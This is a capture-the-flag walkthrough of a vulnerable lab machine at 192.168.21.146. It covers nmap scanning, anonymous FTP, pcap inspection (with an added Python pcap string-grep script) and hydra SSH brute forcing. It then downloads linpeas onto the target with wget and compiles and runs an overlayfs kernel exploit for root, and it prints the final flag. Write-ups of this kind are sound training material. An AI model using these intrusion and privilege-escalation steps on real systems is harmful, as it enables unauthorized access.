nmap -sC -sV -p- 192.168.21.146 -oN vulos2
-sC runs the default NSE scripts, -sV enumerates service versions, -p- scans all 65535 TCP ports, and -oN saves the result in normal format to the file vulos2.
In the result we can see three services running:
Port 21 FTP
Port 22 SSH
Port 80 HTTP
Note that the FTP script output shows anonymous FTP login allowed.
Visiting the IP in a browser shows a simple HTTP site.
Running gobuster reveals the directory /secret, which is nothing but a simple troll page. Running gobuster against /secret reveals nothing further.
So our next step is to use the anonymous FTP login. Log in with the username anonymous; no real password is required. Listing the directory we can see a file called lol.pcap. Let's download this file to our machine:
get lol.pcap
Let's analyse the .pcap file in Wireshark. Looking at packet 40 we find something interesting: the payload says we almost found the directory sup3rs3cr3tdir.
Let's visit this directory on the web server. It contains a file named roflmao; click it to download. Inspecting this file we can see it references the address /0x0856BF.
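As an added example (not part of the original walkthrough), the Python below reads a classic pcap without Wireshark or scapy and pulls printable strings out of every TCP payload, tagged with Wireshark-style 1-based frame numbers, so the hint that was spotted by eye in packet 40 can be grepped for from the command line. The same printable_strings function is what strings(1) does, so it also serves the roflmao step: run it over the file's bytes to pull out the /0x0856BF path. Assumptions: the capture is a classic pcap (not pcapng) with Ethernet link type and IPv4/TCP traffic; the three-frame capture built by sample_pcap() is constructed here, is not lol.pcap, and its hint text is made up to match the wording of the walkthrough.

```python
"""Grep TCP payloads in a classic pcap for printable strings (added example).

Dependency-free reader: pcap global header -> records -> Ethernet/IPv4/TCP ->
payload -> strings(1)-style runs. Frame numbers are 1-based like Wireshark.
The capture built by sample_pcap() is constructed here; it is not lol.pcap.
"""
import struct

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
LINKTYPE_ETHERNET = 1

# pcap magic -> struct byte-order prefix (microsecond and nanosecond variants,
# written on little- or big-endian hosts). pcapng has a different layout.
_MAGICS = {
    b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">",
    b"\x4d\x3c\xb2\xa1": "<", b"\xa1\xb2\x3c\x4d": ">",
}


def iter_frames(data):
    """Yield (frame_no, frame_bytes) for every record in a pcap blob."""
    if len(data) < 24:
        raise ValueError("too short to be a pcap file")
    order = _MAGICS.get(data[:4])
    if order is None:
        raise ValueError("unknown magic %r (pcapng is not handled)" % data[:4])
    linktype = struct.unpack(order + "I", data[20:24])[0]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled, got linktype %d" % linktype)
    off, frame_no = 24, 0
    while off + 16 <= len(data):
        incl_len = struct.unpack(order + "IIII", data[off:off + 16])[2]
        off += 16
        frame_no += 1
        yield frame_no, data[off:off + incl_len]
        off += incl_len


def tcp_payload(frame):
    """TCP payload of an Ethernet/IPv4/TCP frame, or None for anything else."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    if ip[0] >> 4 != 4 or ip[9] != IPPROTO_TCP:
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]          # use the IP length so Ethernet padding is dropped
    if len(tcp) < 20:
        return None
    doff = (tcp[12] >> 4) * 4
    return tcp[doff:]


def printable_strings(blob, min_len=6):
    """Runs of printable ASCII at least min_len long, like strings(1)."""
    out, run = [], bytearray()
    for b in bytes(blob) + b"\x00":   # sentinel flushes the final run
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    return out


def grep_pcap(data, needle=None, min_len=6):
    """(frame_no, string) for every printable run in a TCP payload; with a
    needle, only strings containing it are kept."""
    hits = []
    for no, frame in iter_frames(data):
        payload = tcp_payload(frame)
        if not payload:
            continue
        hits.extend((no, s) for s in printable_strings(payload, min_len)
                    if needle is None or needle in s)
    return hits


def _frame(payload, sport, dport):
    """One Ethernet/IPv4/TCP record with a little-endian pcap record header."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, IPPROTO_TCP, 0,
                     bytes([192, 168, 21, 146]), bytes([192, 168, 21, 1])) + tcp
    pkt = b"\xaa" * 6 + b"\xbb" * 6 + struct.pack("!H", ETHERTYPE_IPV4) + ip
    return struct.pack("<IIII", 0, 0, len(pkt), len(pkt)) + pkt


def sample_pcap():
    """Constructed three-frame capture; frame 3 carries a hint in an HTTP body."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    return header + b"".join([
        _frame(b"GET /secret/ HTTP/1.1\r\nHost: target\r\n\r\n", 51000, 80),
        _frame(b"HTTP/1.1 200 OK\r\n\r\n<html>troll page</html>", 80, 51000),
        _frame(b"HTTP/1.1 200 OK\r\n\r\nyou almost found it: /sup3rs3cr3tdir\r\n", 80, 51000),
    ])


if __name__ == "__main__":
    # On the real capture: grep_pcap(open("lol.pcap", "rb").read(), "sup3rs3cr3tdir")
    # On the downloaded file: printable_strings(open("roflmao", "rb").read())
    for frame_no, text in grep_pcap(sample_pcap()):
        print("frame %d: %s" % (frame_no, text))
```

The reader deliberately trusts the IP total length rather than the captured frame length, so Ethernet trailer padding on short frames does not leak into the payload as junk; and it rejects pcapng and non-Ethernet captures with a clear error instead of silently yielding garbage, which is the usual failure mode of a hand-rolled pcap parser.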
Let's visit this address on the web server; we might find something interesting. We have two folders. Under the good_luck folder we have a username wordlist. Copy this wordlist and keep it on your machine.
Now the tricky / troll part. We have the string Good_job_:) under the folder this_folder_contains_this_password.
At first I thought this should be the password, but when I tried brute forcing it didn't work.
Read the folder name again: this_folder_contains_this_password. It is saying this folder contains this password, and this folder contains Pass.txt. So the password is Pass.txt.
We now have a username list and the password, so let's use hydra to brute force the username.
hydra -L username.txt -p Pass.txt ssh://192.168.21.146
Here the -L flag (capital L) specifies a file of usernames to try; lowercase -l would make hydra use the literal string username.txt as the single username, and nothing would match. The -p flag specifies a single password string, which is Pass.txt.
Hydra finds the username overflow with the password Pass.txt.
Let's log in over SSH with this username and password. We now have a shell as user overflow.
Make the shell interactive using python -c 'import pty; pty.spawn("/bin/bash")' (an SSH session normally already has a TTY, so this step mainly matters when working from a reverse shell).
I then looked around files like /etc/passwd, /home etc. in the hope of finding anything interesting, and found nothing of interest.
For privilege escalation we will use our best friend linpeas (Linux Privilege Escalation Awesome Script): https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
Change to the /tmp directory and download the script. Note that the GitHub URL above is the HTML tree page, not the script itself, so fetch the raw linpeas.sh from the project's releases instead, then make it executable:
cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
And here comes another troll: our SSH connection is closed after a certain time. When the connection is closed, log in over SSH again and download the script again. Once you have run the script and captured its output we don't need to download the script again; redirecting the output to a file means a dropped session does not lose the results.
Looking at the result, we can see the machine is vulnerable to various exploits.
Among the exploits I first tried dirty cow 2, but g++ was not installed on the machine, so I chose the overlayfs exploit.
Copy the exploit's download URL and fetch it on the target with wget. Rename the downloaded file from 37292 to 37292.c, compile it with gcc naming the output binary ofc, then execute the exploit using ./ofc
This should give us a root shell.
Now go to the root directory using cd /root. Inside the root directory we have proof.txt, which contains the flag we need to complete this lab.
cat proof.txt
702a8c18d29c6f3ca0d99ef5712bfbdc